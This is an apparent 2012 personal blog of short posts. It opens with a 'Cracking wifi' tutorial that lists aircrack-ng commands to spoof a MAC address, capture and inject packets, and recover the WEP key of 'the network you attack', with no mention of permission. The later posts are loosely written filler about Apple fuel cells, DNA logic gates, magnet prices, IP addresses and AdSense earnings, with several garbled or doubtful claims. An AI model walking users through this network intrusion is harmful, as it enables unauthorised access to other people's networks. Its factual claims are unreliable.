Wednesday, May 30, 2012

Cracking wifi

Although this is already a common procedure and that most of the people has already implemented this, those who are still to break the wifi code, you can refer to this article.
Note: This will work only for WEP type of encryption and that you need to run a Live Persistent CD of Backtrack 4.
Here '//' is for comments and you don't need to type texts within this.

Open a shell/konsole then start to type:


// then a interface of your computer is shown, for example we take eth1 //

airmon-ng stop eth1
ifconfig eth1 down
macchanger -- mac 00:11:22:33:44:55 eth1
airmon-ng start eth1
airodump-ng eth1
// here note down the BSSID number and channel number of the network you need to attack, we take BSSID no. as 00:11:95:19:40:9B and channel no. as 6//

airodump-ng -c 6 -w pokemon --bssid 00:11:95:19:40:9B eth1

// donot close this shell. open a 2nd shell and write the following://

aireplay-ng -1 0 -a 00:11:95:19:40:9B -h 00:11:22:33:44:55 eth1
aireplay-ng -3 -b 00:11:95:19:40:9B -h 00:11:22:33:44:55 eth1

// keep on the data on the 1st shell. The data should reach more than 10000. minimise the 2nd shell and continue writing following on third shell://

aircrack-ng -b 00:11:95:19:40:9B pokemon-01.cap

// The code is finished. Now when the key is cracked, it is obtained on the shell in the format: aa:bb:cc:dd:ee..... Remove the colons and thus obtain the wifi key of the network you attacked.
For the more knowledge about the scope and facts about the backlink through open sources you can refer to the following link:

.........Enjoy The Key............... //

Server in a small package

Web Server in a small box is a user compatible and highly versatile concept with the help of which the user can launch the hundreds of web pages by connection by the Internet through the layer-3 device like modems and routers. This device is a portable device which can be carried to any part of the world and user can easily host the web pages. The interesting fact is that it can also be accessed through the mobile gprs facility.
The concept of this project explains to the user that server doesnot need large and expensive devices to launch the web hostings.
The overview of the features of this device can be summarised as below:
user customisation: explicit setting of port numbers, ip address and so on
memory: external memories like memory card
dynamic web features: FTP server, SMTP client server, HTTP server, DNS server, SNTP server and much more
user customised file formats
analog outputs and digital outputs
internet controllable ports and many more

Saturday, May 26, 2012


It is well known that all the concepts generated and launched by the famous company APPLE are never free from contradictions. The patent problems have been the headache to the Apple masterminds. Once again Apple has brought a unique concept of Fuel Power Cell to the electronics which is one of the concepts which will bring movement in the world of electronics as brought by the concept of IoS.
This concept is being prepared to launch in Apple laptops. The fuel used will be Hydrogen. The cells converts the fuel into electricity and leaving behind water as the exhaust product. In order to avoid corrosion, stainless steel will be used as electrodes. One individual cell can generate a low voltage of about 0.5V. So 25 such cells are cascaded to produce the suitable voltage to the laptops.
The problem with this concept is also noticeable. The weight of steel makes the portable device heavier. And the failure of one cell can lead to the whole power system to failure. As the remedy, Apple has introduced the idea to bond both cathode and anode of the electrodes in the either end of electrodes. And the cells are arranged in parallel rather than in series to create performance in case of failure of any of the individual cells. Another problem is that it will take some time to excite and thus create a delay in booting. So it is also proposed to keep a Li-Ion battery to perform booting. But on the other hands, this power supply can power the devices to longer times, even for weeks. And another remarkable eco-friendly fact is that the hydrogen cells are the renewable source of energy. This will certainly help to reduce the energy crisis in the world up to a certain extent.

amazing fact about silicon

If anyone asks what is the core element in all these electronics world, then the one and certain answer will be Silicon. The worldwide availability and high possessivity for the electronic conduction has made this element unseparable component of the electronic world. Almost all the computers and the consumer electronics have been the matter to deal with the help of Silicon. It is hard to imagine the world without the Silicon, but in this rapidly developing world, modern scientist are going to break the trend.
Yes, the use of silicon is proposed to be reduced and ultimately replaced by the use of human materials.
The basic component of the electronics, logic gates, are successfully prepared by the help of human DNA and harmless gut bacteria. Although wierd to know but it is proven by the scientists at Imperial College, London. Now the present electronics is assumed to be replaced by ultramodern biological processors.
The amazing concept of bioprocessors have been pleying in everybody's mind. It is proposed that one day such a technology will come when the sensors will swim inside the human arteries, detect the harmful bacterias and provide the medication to the affected zones. Although its a long way to go, lets hope we will see this technology.

Magnets and Speakers

Magnet is the earth's valuable component and the price of magnet seems to touch the sky these days. Due to this, the manufacturers of sound systems have been in real trouble. The speakers, microphones, mobile cells, etc make the wide use of magnet and due to the rise in price of magnet, this field are in the state of closing the production. As magnet is the most important component in any of the sound related transducers, no other alternative components are yet discovered to replace magnets. This fact is also the real problem for the manufacturers. The magnet inside the earth is not rare in amount but it is very much adverse for the health of people which might cause severe health hazards. So the massive magnet producers like China is risking the health of people fo the cost of money. it has increased the tax on the magnet to 1000% and also prevented to open new extraction from inside the earth.
Neodymium is the core element of the magnet and this element has become the element to wonder for these manufacturers. the size of various products are of great concern. So it is now proposed to reduce the size of the speakers. But for tweeting materials, the power should be high. So it is even proposed to mount the tweeter material to be mounted in between the centre of acoustic materials so as to produce the high tweets. The China is provided with so called the monopoly for the magnet productions by most of the worls powerhouses. So we should be thankful to China for bearing the credit to produce the sound devices and avoid the monotony.

error management

Any internet applications and online activities are highly subjected to threats and errors.
Error may occur in the online jobs usually due to the ip problems and invalid access.
We can control the errors by the ways of fault management. For this, we have to determine the error and isolate the rest of the processes from that area.
We should keep record of the faults and maintain the status of our network.
We should be maintaining, adding, and updating the relationships among components and the status of components themselves during network operation.
We should avoid the illegal clicks on the restricted links and we should take good care of the ip while performing our jobs.

Understanding about ip

Ip is a Internet Protocol while protocol defines the rule to perform any network operations which one needs to follow.
It is very much important to Understand the different Kinds of Networking protocols.
IP is the set of numbers assigned to the netwotk user so as to idetify and verify the genuineness of the user.
It is an important parameter for maintaining the security issues of the network and it is a strong tool to monitor the cyber crime.
An IP address comprises of the two levels of information. The network and host arrangements
The ip adresss can be used in two forms, static ip and dynamic ip.
The ip is provided for each network user as soon as the enter or rejoin the network. The common ip format these days is IPV4 while the ip format for the upcoming days is IPV6 and it is the got issue these days since it is a next generation protocol.

adsense info

Application for the ad from the google is the major part in the blogging for money.
You will only be able to earn if google provides you the ads for advertisement.
When your blog or web sites has enough contents, posts or articles, then you can apply for the ads. As soon as you reach the content limit, the google can provide the ads to you. Your page should have the high number of views. Your posts should be commented on and you should acquire enough likes.
when you have the ads on your site or blog, the views should be enough and the clicks should be legal to earn the money.
The blog is attached to the payable accounts like paypal a/c. The balance on the account increases as per the clicks on the ads and the links visit within the ads. But it is to be taken care that the illegal ip clicks, repeated clicks on the same ads and other steps can cause the negative valuation on your site and as well as the account.

other similar ways of moneymaking

Internet is a very vast area of interest. One can find a huge prospects to make money through the net. Like blogging and page promoting there are various other similar tasks for the online money making.Some of them are click sharing, paying per clicks, page viewing, etc but these all are based on the fact that the ultimate result of all these tasks is the web page promoting.
We can form a community of the similar users in the messenger networks like yahoo, hotmail, gmail, etc. A wide variety of the members from around the globe is helpful in impact creation. one user can share their links to other and one can promote the page of other so as to increase the number of views. Posting comments on the client's page can increase the payable amount. The concept of sharing the links through the fan page in the popular social sites has become popular these days. There are various other sites that enlists the new sites and distributes it among the users and pays the users as they just click the urls. Many other concepts can be applied to perform the promoting and ultimately making the money through the net.

Why blog?

Creating the blog site is the preliminary process for the online job and earnings.
In order to enter in the e-business, one needs to have a blog site.
There are many sites where we can create our blog.
Blog can be created for various purposes like personal use for sharing personal views and ideas,marketing use by advertising and so on.
One can upload images, post articles, upload videos, share links and other various web contents in the blog
There are the sites like eblogger or blogspot, wallinside, dinstudio etc where anyone can create the blog for free.
So its easy and important to create the blog to enter the world of e-business

Friday, May 25, 2012

get paid

if you want to earn from the net sitting on your home then you should once log on to I m sure you will find something helpful for your queries. You can start blogging through your own blogsite. You can then make the posts and promote for your page and blog ranking. You can promote by sharing your blog onto the yahoo, facebook, twitter, youtube and so on. After your blog have high ranking and more number of viewers, then you will recieve the google ads in form of adsense....
You will then paid as per the clicks on the adsense account...... You can as well receive the online help from various geeks on this field. You can ask your questions in the related forums.....

Thursday, May 24, 2012


Today's world is fully based upon the online stuffs. Each and every sector is related with the online network. Social, communal, health, home, entertainment, banking and all other aspects rely on online networking. Like wisely, the unemployment is growing as the global problem.
So as to address this worldwide problem, the online marketing and online jobs is the hotcake. Nowadays online job has become the hot issue and everyone is interested to look for the better opportunity in the net. Internet has served as the source of income. For this, various tasks like the article writing, blogging, report making, adsense making, etc are available on the net. Anyone can earn through the net by surfing on this field.